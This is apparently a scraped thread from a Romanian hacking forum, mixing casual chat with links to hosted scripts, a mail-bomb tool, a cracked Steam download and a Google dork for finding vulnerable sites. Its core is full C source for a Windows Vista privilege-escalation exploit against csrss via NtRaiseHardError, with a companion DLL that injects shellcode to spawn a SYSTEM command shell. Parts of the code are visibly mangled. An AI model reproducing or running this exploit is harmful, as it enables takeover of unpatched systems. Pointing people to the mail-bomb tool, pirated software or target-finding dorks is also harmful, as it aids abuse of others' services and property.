Imperfect

Fiat punto & Seat .... fmm de bere

http://rstzone.net/forum/viewtopic.php?t=6265 Care minte ? Sau si g3o la copiat de undeva ?

[offtopic]Shocky teai gandit sa-ti dai o defragmentare :roll:

Uite aici , sper ca asta cauti ! Dai click aici . Undeva mai jos scrie "VNC Authentication Bypass Vulnerability Video" . Sper ca esti multumit . Bafta !

Sunt orb sau acea pagina nu mai exista ? Si nici un alt index ( deocamdata ) .

Multumesc MostWanted , Multumesc Rotty ! Raman dator .

mahahaah )

MARFA ! Vazusem si eu una de olt , ma cautam de telefon telefonu cand lam scos ... deja nu se mai vedea masina :cry:

Are cineva un CFG , frumos pentru CS ? @Rotty am vazut ca postasai pe un forum de design la sectiunea "Counter-Strike" ca ai pus tu intr-un cfg Holly ... , poti sa-l trimit in pm sau sa-l postezi aici ?

http://aeon666.ifastnet.com/rst.php

http://softwareaudit.ifastnet.com/rst.php

Cum zice escalation , e foarte usor . Iti mai bot da un hint : Un fisier a fost creeat sunt numele de exemplu.html inloc de exemplu.txt .. e mai mult un "Mura-n gura" . Spor.

Destule, ar fi dragut daca ai putea sa le urci pe un torrent cu viteza bun

Pentru cei care nu aveti un host unde sa urcati scriptul . Am pus scriptul pe site-ul meu. Pentru link dati un click aici : http://rstzone.net/forum/viewtopic.php?p=39751#39751 Bafta.

MailBomb - http://rootb0x.net/mailbomb/

//26-12-2006 ]erasmus[/ORC //exploit NtRaiseHardError privesc and load dll into csrss //this version only is vista, other version can be worked //with proper offsets, i will complete them soon //imperfect but sometime work, ok for proto type;) //dll limit to 8 chars but maybe can work around by //\xxx\..\dll type trick and use LoadLibraryW, now is //C:\TEST but another drive maybe work #define offs1 0x30 #define offs2 0xBBD0 #include "windows.h" #include "stdio.h" DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD, PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD,PVOID, PDWORD); DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWORD,PVOID, DWORD,PDWORD); DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,PVOID*, DWORD,PDWORD); HANDLE hl; HANDLE hs; DWORD sb; LPVOID lpc(LPCWSTR w){//cesar trick WORD n[4]; SECURITY_QUALITY_OF_SERVICE q; LPVOID p; DWORD d; DWORD c[6],s[3]; BYTE b[0x28]; n[0]=n[1]=wcslen(w)*2; *(PDWORD)(n+2)=(DWORD)w; memset(&q,0,sizeof(q)); q.Length=sizeof(q); p=NULL; d=0x1000; memset(&c,0,sizeof(c)); c[0]=sizeof(c); memset(&s,0,sizeof(s)); s[0]=sizeof(s); memset(&b,0,sizeof(); b[1]=1; hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL, PAGE_READWRITE,0,d,NULL); if(!hs)return NULL; p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); if(!p)return NULL; c[1]=(DWORD)hs; c[3]=d; c[4]=(DWORD)p; d=sizeof(; if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d)) return NULL; sb=c[5]; return p; } HANDLE e1,e11; DWORD WINAPI tp1(LPVOID a){ LPVOID p[7]; DWORD d; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0x1B001AE; p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; p[5]=(LPVOID)0x100010; p[6]=L"erasmus1"; while(1){ WaitForSingleObject(e1,INFINITE); NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e11); } return 0; } DWORD aaa,bbb; HANDLE e2,e22; DWORD WINAPI tp2(LPVOID a){ BYTE b[0xD8]; LPVOID p[7]; DWORD d; memset(&b,0,sizeof(); *(PDWORD)(b+0x3C)=2; *(PDWORD)(b+0x48)=1; *(PDWORD)(b+0x4C)=1; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0xD600D6; p[4]=&b; p[5]=(LPVOID)0x100010; p[6]=L"erasmus2"; while(1){ WaitForSingleObject(e2,INFINITE); memcpy(&b,"C:\\TEST",8); *(PDWORD)(b+0x08)=aaa; *(PDWORD)(b+0x0C)=bbb; *(PDWORD)(b+0x70)=aaa+0x100; *(PDWORD)(b+0x74)=aaa+0x100; NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e22); } return 0; } STARTUPINFO cps; PROCESS_INFORMATION cpi; void w(DWORD a,DWORD d){ HWND h; aaa=d; bbb=a; SetEvent(e1); do{h=FindWindow(NULL,"erasmus1");}while(!h); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); SetEvent(e2); do{h=FindWindow(NULL,"erasmus2");}while(!h); TerminateThread(cpi.hThread,0); Sleep(100); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); } int main(int c,char**v){ char sd[MAX_PATH]; char dp[MAX_PATH]; WCHAR pp[MAX_PATH]; WCHAR pn[MAX_PATH]; HMODULE nt,kr,ad; DWORD se,cs,ws,u,d,h; HANDLE t; LPBYTE sc; GetSystemDirectory(sd,sizeof(sd)); sprintf(dp,"%s\\csrsrv.dll",sd); cs=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\winsrv.dll",sd); ws=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\ntdll.dll",sd); nt=LoadLibrary(dp); sprintf(dp,"%s\\kernel32.dll",sd); kr=LoadLibrary(dp); sprintf(dp,"%s\\advapi32.dll",sd); ad=LoadLibrary(dp); *(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConnectPort"); *(LPVOID*)&NtQueryInformationProcess=GetProcAddress(nt, "NtQueryInformationProcess"); *(LPVOID*)&NtRaiseHardError=GetProcAddress(nt, "NtRaiseHardError"); if(2==c){ d=atoi(v[1]); if(!d){ printf("no args need\n"); return -1; } t=OpenProcess(PROCESS_ALL_ACCESS,0,d); if(!t){ printf("no args need\n"); return -1; } __asm mov eax,fs:[0x18] __asm mov eax,[eax+0x30] __asm mov eax,[eax+0x1D4] __asm mov se,eax if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se); else swprintf(pp,L"\\Windows"); swprintf(pn,L"%s\\ApiPort",pp); sc=(LPBYTE)lpc(pn); swprintf(pn,L"%s\\SbApiPort",pp); if(!sc)sc=(LPBYTE)lpc(pn); if(!sc)return -1; h=0; DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE)&h,0,0,2); WriteProcessMemory(t,&hs,&h,4,&d); WriteProcessMemory(t,&sb,&sb,4,&d); Sleep(INFINITE); }else{ STARTUPINFO cps; PROCESS_INFORMATION cpi; hs=sc=NULL; sb=0; memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId()); if(!CreateProcess(NULL,sd,NULL,NULL,0, CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,NULL,&cps, &cpi)){ printf("spawn fail\n"); return -1; } Sleep(3000); if(!hs){ printf("lpc fail\n"); return -1; } sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); } memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; e1=CreateEvent(NULL,0,0,NULL); e11=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp1,NULL,0,NULL); e2=CreateEvent(NULL,0,0,NULL); e22=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp2,NULL,0,NULL); u=cs+offs2; *(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"LoadLibraryA"); w(u,sb); Sleep(INFINITE); return 0; } //test.c //26-12-2006 ]erasmus[/ORC //dll for load in csrss by raise.c //repair csrss and create OWNED.TXT and try create system cmd //i can exec shell code in lpc shared section but LoadLibrary //is for work around of DEP on vista //also imperfect but also is proto type! //offsets is for vista #define offs1 0x5F89 #define offs2 0xBBD0 #define offs3 0xBBFC #define offs4 0x3F0CC #include "windows.h" LONG WINAPI uef(LPEXCEPTION_POINTERS a){ Sleep(INFINITE); return 0; } DWORD WINAPI tp(LPVOID a){ HMODULE kr,ws; BYTE b[0x100]; DWORD c,d; HANDLE h,t; kr=GetModuleHandle("kernel32"); ws=GetModuleHandle("winsrv"); h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWORD)ws+offs4)); c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(,MEM_COMMIT,PAGE_EXE CUTE_READWRITE); d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69); memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x 50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61\x30\x5C\x44\x65\x 66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63\x6D\x64\x00\x50\x 50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1\xFC\x51\x50\xE8\x 00\x00\x00\x00\x83\xC4\x58\xC3",73); *(LPDWORD)(b+65)=d; WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(,&d); t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_START_ROUTINE)c,NULL ,0,NULL); WaitForSingleObject(t,INFINITE); return 0; } BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){ DWORD cs,d; LPDWORD p,f,l; HANDLE h; if(DLL_PROCESS_ATTACH==dwReason){ SetUnhandledExceptionFilter(uef); h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL, CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL); WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL); CloseHandle(h); cs=(DWORD)GetModuleHandle("csrsrv"); *(LPDWORD)(cs+offs2)=0; __asm mov eax,esp __asm mov p,eax while(1){ if(cs+offs1==*p){ *p=(DWORD)ExitThread; d=p[1]+8; break; } p=p+1; } p=*(LPDWORD*)(cs+offs3)+2; f=p; while(d!=f[0])f=*(LPDWORD*)f; l=p; while(d!=l[1])l=*(LPDWORD*)(l+1); *(LPDWORD*)f=l; *(LPDWORD*)(l+1)=f; for(d=0;d<100;d=d+1){ p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8); memset(p,0,0xD8); p[2]=(DWORD)p+0x08; p[3]=(DWORD)p+0x08; p[4]=(DWORD)p+0x10; p[5]=(DWORD)p+0x10; p[13]=0x240000; p[15]=1; p[16]=1; p[28]=(DWORD)p+0x78; p[29]=(DWORD)p+0x80; } p=(LPDWORD)GetProcessHeap(); while(1){ p=p+1; if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&& !strcmp(*(LPSTR*)(p+1),"CSRSS")){ d=p[1]+6; while(1){ p=p-1; if(d-(DWORD)p==*p)break; } break; } } *(LPDWORD*)(cs+offs2)=p; Sleep(0); CreateThread(NULL,0,tp,NULL,0,NULL); } return TRUE; }

Ata era logic .

Cu placere

Interant , multumesc. Pentru jucatori de CS am uploadat steam deja crakuit . Link : Click for download PacSteam Edit: Interesant* , eram foarte obosit

Foarte folositor , multumesc.

Dupa cum vezi merge : Image: @BryanMax : " cu ce browser ai incercat... daca cu mozilla...incearca cu Internet Explorel " nu e vorba de browser , am incercat cu mozill si IE si merge cu amandoua .

Sincer, nu am incercat scriptu , dar incerca sa cauti pe google : inurl :"alltopics.php" . Vezi ca nu cred ca vei avea noroc la primu site/prima pagina , daca tot vrei sa faci ceva cauta pana gasesti.

[offtopic=ne cunoastem]